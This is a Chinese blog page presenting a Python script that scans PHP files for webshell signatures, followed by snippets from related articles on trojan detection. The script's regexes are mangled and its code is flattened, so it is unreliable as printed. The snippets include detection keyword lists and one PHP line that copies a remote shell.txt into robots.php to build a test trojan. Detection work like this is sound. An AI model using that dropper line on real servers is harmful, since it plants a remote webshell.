如何分辨php文件有没有木马,扫描目录下的php文件,是不是含有木马特征

最新推荐文章于 2021-12-10 19:57:56 发布
最新推荐文章于 2021-12-10 19:57:56 发布
阅读量477 收藏
点赞数
文章标签: 如何分辨php文件有没有木马

扫描目录下的php文件,是否含有木马特征

shell_checkl

#!/usr/bin/python#-*- encoding:UTF-8 -*-##### @package## @desc 扫描目录下的php文件,是否含有木马特征,注意,不是“木马扫描”## @useage python shell_check.py /your/web/path/ 1=是否递归###import osimport sysimport reimport timedef listdir(dirs,liston='0'): flog = open(os.getcwd()+"/check_php_shell.log","a+") if not os.path.isdir(dirs): print "directory %s is not exist"% (dirs) return lists = os.listdir(dirs) for list in lists: filepath = os.path.join(dirs,list) if os.path.isdir(filepath): if liston == '1': listdir(filepath,'1') elif os.path.isfile(filepath): filename = os.path.basename(filepath) if re.search(r"\.(?:php|inc|html?)$", filename, re.IGNORECASE): i = 0 iname = 0 f = open(filepath) while f: file_contents = f.readline() if not file_contents: break i += 1 match = re.search(r'''(?P\b(?:include|require)(?:_once)?\b)\s*\(?\s*["'](?P.*?(?eval|proc_open|popen|shell_exec|exec|passthru|system)\b\s*\(', file_contents, re.IGNORECASE| re.MULTILINE) if match: function = match.group("function") if iname == 0: info = '\n[%s] :\n'% (filepath) else: info = '' info += '\t|-- [%s] line [%d] \n'% (function,i) flog.write(info) print info iname += 1 match = re.findall(r'(\$[a-z0-9_]*?\s*?\(.*?\))', file_contents, re.IGNORECASE) if match: if iname == 0: info = '\n[%s] :\n'% (filepath) else: info = '' info += '\t|-- [%s] line [%d] \n'% (match[0],i) flog.write(info) print info iname += 1 f.close() flog.close()if '__main__' == __name__: argvnum = len(sys.argv) liston = '0' if argvnum == 1: action = os.path.basename(sys.argv[0]) print "Command is like:\n %s D:\wwwroot\ \n %s D:\wwwroot\ 1 -- recurse subfolders"% (action,action) quit() elif argvnum == 2: path = os.path.realpath(sys.argv[1]) listdir(path,liston) else: liston = sys.argv[2] path = os.path.realpath(sys.argv[1]) listdir(path,liston) flog = open(os.getcwd()+"/check_php_shell.log","a+") ISOTIMEFORMAT='%Y-%m-%d %X' now_time = time.strftime(ISOTIMEFORMAT,time.localtime()) flog.write("\n----------------------%s checked ---------------------\n"% (now_time)) flog.close()

相关文章

相关视频

左颈吻客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
php 木马文件,扫描目录下的php文件,是否含有木马特征
weixin_42509398的博客
03-09 231
[python]#!/usr/bin/python#-*- encoding:UTF-8 -*-##### @package## @desc 扫描目录下的php文件,是否含有木马特征,注意,不是“木马扫描”## @useage python shell_check.py /your/web/path/ 1=是否递归###import osimport sysimport reimport time...
python webshell_精确查找PHP WEBSHELL木马的方法(1)
weixin_39957186的博客
12-08 230
先来看下反引号可以成功执行命名的代码片段。代码如下:复制代码 代码如下:`ls -al`;`ls -al`;echo "sss"; `ls -al`;$sql = "SELECT `username` FROM `table` WHERE 1";$sql = 'SELECT `username` FROM `table` WHERE 1'/*无非是 前面有空白字符,或者在一行代码的结束之后,后面接...
网页php木马小马大马,php木马webshell扫描器代码
weixin_27330481的博客
03-09 650
/*+--------------------------------------------------------------------------+| Codz by indexphp Version:0.01 || (c) 2009 indexphp || http://www.indexphp.org |+----------------------------------------...
php 图片木马检测
weixin_30709635的博客
07-23 611
thinkphp 自带一些基本检测,在网上查了一下 又添加了16进制检测 代码如下 我是在tp的upload 文件里添加调用的 if($this->checkHex($file['tmp_name'])!='0'){ $this->error = '上传非法图片'; return false; }; private static function checkHex($imag...
php文件木马扫描
09-21
php文件木马扫描扫描出来的文件根据自己判断是否被挂马!
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
PHP Web木马扫描器代码 v1.0 安全测试工具
10-28
扫描器的核心功能部分并未在提供的代码中展示,但通常会包含遍历指定目录,逐个检查PHP文件,并对比特征码的逻辑。如果发现匹配的特征码,扫描器会将文件标记为可疑并报告给用户。然而,需要注意的是,扫描结果中的...
php木马webshell扫描器代码
12-18
这个脚本的主要功能是扫描指定目录(默认为'cms')内的PHP文件,检测其中是否存在危险函数,如`eval`, `cmd`, `passthru`等,这些函数常被用于执行恶意代码。 代码中设置了几个关键变量: 1. `$dir`: 指定要扫描的...
php木马扫描工具
01-15
不错的源码 先解压出来 用D盾扫一下,基本可疑的东西都能扫出来,然后自己打开看一下
php木马检测关键词
A11085013的专栏
06-18 1367
VBScript.Encode javaScript.Encode HKEY_LOCAL_MACHINE shell 提升权限 挂马 上传组件 system32 Serv-U #l@$ 提权 批量替换 清马 OOO000000 eval(gzinflate( eval(base64_decode( eval($_ eval copy($_FILES move_
【安全攻略】Thinkphp5.0检测上传的文件是否包含木马
美奇软件开发工作室
12-10 4247
一、要做测试,那么肯定是要准备一张带木马的图片文件,制作木马图片的方法: 1、创建一个名为test.php文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
PHP程序木马、漏洞排查
Sunshine晶滴博客
11-26 1054
一、PHP程序提示sql注入漏洞的处理方法【摘自西部数码】http://faq.myhostadmin.net/faq/listagent.asp?unid=645 亲测此方法有时会使页面提示“您的提交带有不合法参数,谢谢合作!”, 所以如果后期还要改动网站信息的不建议用此方法。 二、已被入侵的dede网站,下载专杀工具扫描查杀【摘自西部数码】: http://faq.myhostadmi...
解析一个PHP木马PHP文件上传安全检测组件
Z.X的博客
12-01 6041
2021年12月1日08:43:32 前几天同事问我一个关于图片文件检测是否是脚本的问题,问题的根源就是文件上传图片,是否是隐藏的脚本问题 木马文件源码是这样的: <?php $password='phpyyds';//登录密码 //----------本程序完美支持PHP 4, PHP 5, PHP 7------------------// $c="chr"; session_sta...
php木马特征,木马文件特征关键字
weixin_31321157的博客
03-21 444
木马文件特征关键字*fsockopen**base64_decode**$_POST**$_GET**eval*(*gzuncompress**eval*(*gzinflate**eval*(*hex2bin*(**eval*(*base64_decode*(**eval*urldecode**urldecode*eval**server*createobject*WScript.ShellWsc...
php文件包含的几种方式和特点,php文件包含的几种方法
weixin_42169674的博客
03-19 265
四种语句PHP中有四个加载文件的语句:include、require、include_once、require_once。基本语法require:require函数一般放在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件,包含并尝试执行引入的脚本文件。require的工作方式是提高PHP的执行效率,当它在同一个网页中解释过一次后,第二次便不会解释。但同样的,正因为它不会重复解...
php目录扫描监控增强版,PHP Web木马扫描器代码
weixin_39825322的博客
03-18 77
** php目录扫描监控增强版** @version 1.0*下面几个变量使用前需要手动设置***//*===================== 程序配置 =====================*/$pass="test";//设置密码$jkdir="."; //设置监控扫描目录,当前目录为‘.‘,上一级目录为‘..‘,也可以设置绝对路径,后面不要加斜杠,默认为当前目录$logfilena...
对一个php木马的分析
Welcome Friends~
05-03 2963
    前一段时间上网查找到了一个经过“加密”过的php木马,出于好奇就对其代码进行了分析:php源代码如下:     分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。解码解压缩代码如下:<?phpfunction writeto
Python网络安全:洞悉文件上传木马与防御策略
"Python网络安全项目开发实战,通过看清文件上传木马的原理和手法,学习如何保护服务器免受黑客攻击。本教程深入讲解了文件上传木马的类型、变形技巧以及应对策略,旨在提升开发者对网络安全的意识和防护能力。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值